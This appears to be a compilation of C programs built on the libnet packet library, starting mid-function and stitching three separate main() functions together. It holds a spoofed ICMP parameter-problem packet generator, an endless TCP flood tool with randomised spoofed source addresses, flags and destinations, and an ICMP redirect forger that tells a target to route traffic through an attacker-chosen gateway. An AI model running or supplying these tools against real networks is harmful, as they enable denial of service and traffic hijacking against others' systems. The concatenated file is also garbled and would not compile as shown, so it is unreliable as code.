* write packet
*/
written_bytes = libnet_write_ip(socket, packet, packet_size);
/*
* make sure the number of written bytes jives with what we expect
*/
if (written_bytes < packet_size)
libnet_error(LN_ERR_WARNING, "libnet_write_ip only wrote %d of %d bytes\n", written_bytes, packet_size);
/*
* we're done with this packet
*/
libnet_destroy_packet(&packet);
/*
* we're done writing
*/
if (libnet_close_raw_sock(socket) == -1)
libnet_error(LN_ERR_WARNING, "libnet_close_raw_sock couldn't close the interface");
return (written_bytes == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
int main(int argc, char **argv)
{
u_long src_ip = 0, dst_ip = 0, ins_src_ip = 0, ins_dst_ip = 0;
u_long *problem = NULL;
u_char *packet = NULL;
int sock, c, len = 0;
long acx, count = 1;
struct icmp *icmp;
struct ip *ip;
/* It appears that most IP options of length >0 will work
* Works with 128, 64, 32, 16... And the normal ones 137...
* Does not work with 0, 1 */
u_char data[] = {137};
int data_len = sizeof(data);
printf("Written by Mike Frantzen... <*****@*****.**>\n");
printf("For test purposes only... yada yada yada...\n");
src_ip = inet_addr("10.10.10.10");
while ( (c = getopt(argc, argv, "d:s:D:S:l:c:")) != EOF ) {
switch(c) {
case 'd': dst_ip = libnet_name_resolve(optarg, 1);
break;
case 's': src_ip = libnet_name_resolve(optarg, 1);
break;
case 'D': ins_dst_ip = name_resolve(optarg, 1);
break;
case 'S': ins_src_ip = name_resolve(optarg, 1);
break;
case 'l': data_len = atoi(optarg);
break;
case 'c': if ( (count = atol(optarg)) < 1)
count = 1;
break;
default: printf("Don't understand option.\n");
exit(-1);
}
}
if ( dst_ip == 0 ) {
printf("Usage: %s\t -d <destination IP>\t[-s <source IP>]\n",
rindex(argv[0], '/') == NULL ? argv[0]
: rindex(argv[0], '/') + 1);
printf("\t\t[-S <inner source IP>]\t[-D <inner dest IP>]\n");
printf("\t\t[-l <data length>]\t[-c <# to send>]\n");
exit(-1);
}
if ( ins_dst_ip == 0 )
ins_dst_ip = src_ip;
if ( ins_src_ip == 0 )
ins_src_ip = dst_ip;
if ( (packet = malloc(1500)) == NULL ) {
perror("malloc: ");
exit(-1);
}
if ( (sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1 ) {
perror("socket: ");
exit(-1);
}
/* 8 is the length of the ICMP header with the problem field */
len = 8 + IP_H + data_len;
bzero(packet + IP_H, len);
libnet_build_ip(len, /* Size of the payload */
0xc2, /* IP tos */
30241, /* IP ID */
0, /* Frag Offset & Flags */
64, /* TTL */
IPPROTO_ICMP, /* Transport protocol */
src_ip, /* Source IP */
dst_ip, /* Destination IP */
NULL, /* Pointer to payload */
0,
packet); /* Packet memory */
/* ICMP Header for Parameter Problem
* --------------+---------------+---------------+---------------
*| Type (12) | Code (0) | Checksum |
* --------------+---------------+---------------+---------------
*| Pointer | unused |
* --------------+---------------+---------------+---------------
* Internet Header + 64 bits of original datagram data....
*/
icmp = (struct icmp *) (packet + IP_H);
problem = (u_long *) (packet + IP_H + 4); /* 4 = ICMP header */
icmp->icmp_type = ICMP_PARAMPROB;
icmp->icmp_code = 0; /* Indicates a problem pointer */
*problem = htonl(0x14000000); /* Problem is 20 bytes into it */
/* Need to embed an IP packet within the ICMP */
ip = (struct ip *) (packet + IP_H + 8); /* 8 = icmp header */
ip->ip_v = 0x4; /* IPV4 */
ip->ip_hl = 0xf; /* Some IP Options */
ip->ip_tos = 0xa3; /* Whatever */
ip->ip_len = htons(data_len); /* Length of packet */
ip->ip_id = 30241; /* Whatever */
ip->ip_off = 0; /* No frag's */
ip->ip_ttl = 32; /* Whatever */
ip->ip_p = 98; /* Random protocol */
ip->ip_sum = 0; /* Will calc later */
ip->ip_src.s_addr = ins_src_ip;
ip->ip_dst.s_addr = ins_dst_ip;
/* Move our data block into the packet */
bcopy(data, (void *) (packet + IP_H + IP_H + 8), data_len);
/* I hate checksuming. Spent a day trying to get it to work in
* perl... That sucked... Tequilla would have helped immensly.
*/
libnet_do_checksum((unsigned char *) ip, IPPROTO_IP, data_len);
/* Bah... See above comment.... */
libnet_do_checksum(packet, IPPROTO_ICMP, len);
printf("Sending %li packets", count);
for (acx = 0; acx < count; acx++) {
if( libnet_write_ip(sock, packet, len + IP_H) < (len + IP_H))
perror("write_ip: ");
else printf(".");
}
printf("\n\n");
return( 0 );
}
int
main (int argc, char *argv[])
{
int i, loop;
/* no payload yet */
int size = LIBNET_PACKET;
opt.seqn = opt.ackn = opt.flags = 0;
opt.dport = opt.sport = opt.frag = 0;
opt.ttl = 255;
opt.winsize = 16384;
opt.tos = 0x08;
signal (SIGINT, (void (*)()) abort);
srand (time (NULL) + getpid ());
srandom (time (NULL) + getpid ());
banner ();
parse_args (argc, argv);
if (!whocares)
{
if (!local)
{
if (!(opt.dst = libnet_name_resolve (dsthost, LIBNET_RESOLVE)))
{
libnet_error (LIBNET_ERR_FATAL,
":: invalid destination IP address: %s\n", dsthost);
exit (1);
}
printf (":: destination host - %s\n", dsthost);
}
else
printf (":: destination host - local\n");
}
else
printf (":: destination host - whocares\n");
printf (":: destination port(s)");
for (i = 1; i < ports + 1; i++)
printf (" - %d", portarray[i]);
printf ("\n");
if (libnet_init_packet (size, &packet) == NULL)
{
libnet_error (LIBNET_ERR_FATAL,
":: libnet_init_packet failed\n");
}
if ((s = libnet_open_raw_sock (IPPROTO_RAW)) == -1)
{
libnet_error (LIBNET_ERR_FATAL, ":: cannot open socket.\n");
}
printf (":: spanking...\n");
printf (":: press ^C to end...\n");
for (;;)
{
for (i = 1; i < ports + 1; i++)
{
if (whocares)
change2 = random () & 01;
if (ismult)
{
opt.src = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254);
if (local)
opt.dst = ((224 + rand () % 239) << 24) + (0 << 16) + (0 << 8) + (rand () % 5);
else
{
if (change2)
opt.dst = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254);
else
opt.dst = rand ();
}
}
else
{
opt.src = rand ();
if (local)
opt.dst = ((224 + rand () % 239) << 24) + (0 << 16) + (0 << 8) + (rand () % 5);
else
{
if (change2)
opt.dst = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254);
else
opt.dst = rand ();
}
}
if (isrand)
{
loop = rand () % 5;
for (i = 0; i <= loop; i++)
opt.flags |= flag_array[rand () % 5];
opt.frag = frag_array[rand () % 3];
opt.ackn = random ();
opt.sport = 1024 + rand () % 32000;
opt.tos = tos_array[rand () % 3];
opt.ttl = rand () % 255;
opt.winsize = rand () % 32000;
if (change)
ismult = random () & 01;
}
opt.ident = random ();
opt.seqn = random ();
if (!stream)
opt.ackn = random ();
if (portarray[i] == 0)
opt.dport = rand () % 1024;
else
opt.dport = portarray[i];
libnet_build_ip (TCP_H, opt.tos, opt.ident, opt.frag, opt.ttl, IPPROTO_TCP, opt.src, opt.dst, NULL, 0, packet);
libnet_build_tcp (opt.sport, opt.dport, opt.seqn, opt.ackn, opt.flags, opt.winsize, 0, NULL, 0, packet + IP_H);
if (libnet_do_checksum (packet, IPPROTO_TCP, TCP_H) == -1)
{
libnet_error (LIBNET_ERR_FATAL, ":: libnet_do_checksum failed\n");
}
libnet_write_ip (s, packet, size);
}
}
return 1;
}
int
main(int argc, char **argv)
{
int sockfd, c;
u_char *buf;
u_long src, dst, gateway;
if (argc < 4)
{
fprintf(stderr,
"usage: %s <old_router> <target> <new_gateway>\n",
argv[0]);
exit(EXIT_FAILURE);
}
if (!(src = libnet_name_resolve(argv[1], 1)))
{
perror("Error resolving source host");
exit(EXIT_FAILURE);
}
if (!(dst = libnet_name_resolve(argv[2], 1)))
{
perror("Error resolving destination host");
exit(EXIT_FAILURE);
}
if (!(gateway = libnet_name_resolve(argv[3], 1)))
{
perror("Error resolving gateway host");
exit(EXIT_FAILURE);
}
if (libnet_init_packet(IP_MAXPACKET, &buf) == -1)
{
perror("Couldn't allocate memory for header");
exit(EXIT_FAILURE);
}
if ((sockfd = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
{
perror("Couldn't open raw socket");
exit(EXIT_FAILURE);
}
libnet_build_ip(LIBNET_ICMP_REDIRECT_H + LIBNET_IP_H,
IPTOS_LOWDELAY | IPTOS_THROUGHPUT,
242,
0,
48,
IPPROTO_ICMP,
src,
dst,
NULL,
0,
buf);
libnet_build_icmp_redirect(
ICMP_REDIRECT,
ICMP_UNREACH_HOST,
gateway,
0, /* just an ip header */
IPTOS_LOWDELAY | IPTOS_THROUGHPUT, /* IP tos */
424, /* IP ID */
0, /* Frag stuff */
64, /* TTL */
IPPROTO_ICMP, /* Transport protocol */
dst, /* Source IP */
src, /* Destination IP */
NULL, /* pointer to payload */
0, /* size of payload */
buf + LIBNET_IP_H); /* packet header memory */
libnet_do_checksum(buf, IPPROTO_ICMP, LIBNET_ICMP_REDIRECT_H +
LIBNET_IP_H);
c = libnet_write_ip(sockfd, buf, LIBNET_ICMP_REDIRECT_H + 2 *
LIBNET_IP_H);
if (c != LIBNET_ICMP_REDIRECT_H + 2 * LIBNET_IP_H)
{
fprintf(stderr, "Error writing to socket, only wrote %d bytes\n", c);
exit(EXIT_FAILURE);
}
printf("Completed, wrote %d bytes\n", c);
libnet_destroy_packet(&buf);
exit(EXIT_SUCCESS);
}
